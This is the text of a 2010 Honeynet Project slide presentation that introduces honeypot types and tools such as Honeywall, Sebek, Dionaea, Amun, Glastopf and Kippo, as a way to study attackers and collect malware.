Honeypots Adel Karimi The Honeynet Project Nov 14, 2010 USE TO KNOW YOUR ENEMIES
Honeypots
Adel Karimi The Honeynet Project
Nov 14, 2010
USE
TO KNOW YOUR ENEMIES
Speaker
Adel Karimi
Member of The Honeynet Project (Iranian Chapter Lead)
Editor-in-chief of Snoop Security Ezine
M.S. Student @ Tehran Polytechnic
…
Agenda
• About The Honeynet Project
• Introduction to Honeypot
• High-Interaction Honeypots
• Low-Interaction Honeypots
• Client Honeypots
The Honeynet Project
• Founded in 1999, The Honeynet Project is an
international, non-profit research organization
dedicated to improving the security of the Internet at
no cost to the public.
• We accomplish this goal in the following three ways:
– Awareness - We raise awareness of the threats and
vulnerabilities that exist in the Internet today
– Information - For those who are already aware and
concerned, we provide details to better secure and defend
your resources
– Tools
~ 40 International Chapters
Iranian Honeynet Chapter
Honeynet Project Challenges
• Learn about threats, analyze attacks, and share
findnings..
//honeynet.org/challenges
• Past Challenges: – Challenge 6 - Analyzing Malicious Portable Destructive Files
– Challenge 5 - Log Mysteries
– Challenge 4 - VoIP
– Challenge 3 - banking troubles
– Challenge 2 - browsers under attack
– Challenge 1 - pcap attack trace
Honeypots
• Definition: A honeypot is a security
resource whose value lies in being probed,
attacked, or compromised.
- Lance Spitzner
• Has no production value, anything going to
or from a honeypot is likely a probe, attack
or compromise
Honeypots
• Uses of honeypots – Slowing down and following incoming attackers
– Catching and analyzing 0-days, malwares, botnets,
and so on
– Improving intrusion detection systems
• SurfIDS
• Nebula (An Intrusion Signature Generator)
“To learn the tools, tactics and motives involved in
computer and network attacks.”
SurfIDS
Features: • Distributed sensors, Central honeypot deployment, Central logging.
Honeypots
• Honeypot vs. IDS
• Honeynet:
– A network of [High-Interaction] honeypots
– Main requirements:
• Data Control
• Data Capture
• Data Analysis
• Data Collection
Types of Honeypots
• Production vs. Research honeypots:
– Production honeypots protect an organization,
while research honeypots are used to learn.
• Different Types:
– High-Interaction
• Real environment
– Low-Interaction
• Simulated resource(s)
• Physical vs. Virtual !?
High-Interaction Honeypots
• Honeywall For capturing, controlling and analyzing attacks
– It creates an architecture that allows you to deploy both LI
and HI honeypots, but is designed primarily for HI.
– Layer 2 bridging device (Based on CentOS 5)
– Tools:
• IPtables
• Snort_inline
• Snort
• Hflow
• P0f
• Argus
• Sebek
• Walleye
Honeywall
Walleye web interface
High-Interaction Honeypots
• SEBEK
– For “data capture”
– Hidden kernel module that captures all
activities
High-Interaction Honeypots
• Qebek (QEMU Sebek) – A QEMU based HI honeypot monitoring tool which
aims at improving the invisibility of monitoring the
attackers’ activities in HI honeypots.
– Two techniques: Virtual machine introspection (VMI)
and system view reconstruction (SVR).
– VMI enabled the IDS or other security system to monitor the
system events from outside the virtual machine, while SVR
allows the monitoring system to reconstruct meaningful high OS-
level information from the raw hardware-level information
generated by VMI
• Read the recently published KYT paper, “Qebek - Conceal the Monitoring” - The paper is available from http://honeynet.org/papers/KYT_qebek
Low-Interaction Honeypots
• Honeyd – Written by Niels Provos in 2002.
– Available at www.honeyd.org
Features:
• Simulates thousands of virtual hosts at the same time
• Configuration of arbitrary services via simple configuration file
• Simulates operating systems at TCP/IP stack level
• Tarpit
• Dynamic templates
• Subsystem virtualization:
– Run real UNIX applications under virtual Honeyd IP addresses
Low-Interaction Honeypots
• Nepenthes
– Nepenthes is a versatile tool to collect
malware. It acts passively by emulating
known vulnerabilities and downloading
malware trying to exploit these vulnerabilities. (Excerpt from Nepenthes website)
– Nepenthes is outdated
• Do not use Nepenthes, use Dionaea instead.
• Read why: http://carnivore.it/2009/10/27/introducting_dionaea
• PHARM - is a client/server tool to manage, report and
analyze all your distributed nepenthes instances from
one interface.
Low-Interaction Honeypots
• Mwcollect – mwcollectd is a versatile malware collection
daemon, uniting the best features of nepenthes and
honeytrap.
Low-Interaction Honeypots
• Dionaea
– Nepenthes successor
– Dionaea intention is to trap malware exploiting vulnerabilities exposed by services offerd to a network.
• Features: – Static state machines to emulate vulnerable service
– Pattern matching to extract values from shellcode
– Download copies of the attacking worm
– Store on disc, or submit to a sandbox
Dionaea
• Features:
– Implement required parts of the SMB protocol
– Uses libemu (Beyond pattern matching)
– Less services, better emulation and better logging..
Low-Interaction Honeypots
• Amun – A Python Honeypot
– Basically a nepenthes port to python
Amun
• A sample of collected attack data from Amun:
Amun
DEMO
//Using Metasploit to Launch an Attack against Amun (MS08-067)
Source: http://amunhoney.sourceforge.net
Low-Interaction Honeypots
• A new approach..
• Glastopf – A dynamic, LI web-app honeypot
– A minimalistic web server written in Python
– Collects information about web application-based attacks like RFI, SQL injection, and LFI
– Glastopf scans the incoming request for strings like “=http://” or “=ftp://” Try to download and analyze the file and respond as close as possible to the attacker's expectations
– The attacker sends us for example a bot, shell or spreader
Client Honeypots
• What is a HoneyClient!?
• Drive-by Download Attacks
Source: http://www.honeynet.org/papers/mw Source: Canadian Honeynet Project
Other Types of Honeypots
• WiFi Honeypot
• VoIP Honeypot
– VoIP Honey
– Artemisa
• SSH Honeypot
– Kippo
– Kojoney
• …
Conclusion
• You can use Honeypots to know your
enemies..!
– Collecting Malwares
– Tracking Botnets
– …
Virtual Honeypots: From Botnet
Tracking to Intrusion Detection
By Niels Provos, Thorsten Holz
Use Honeypots to Know Your Enemies
By Adel Karimi Iranian Honeynet Chapter adel.net at Gmail.com
Thank You..
?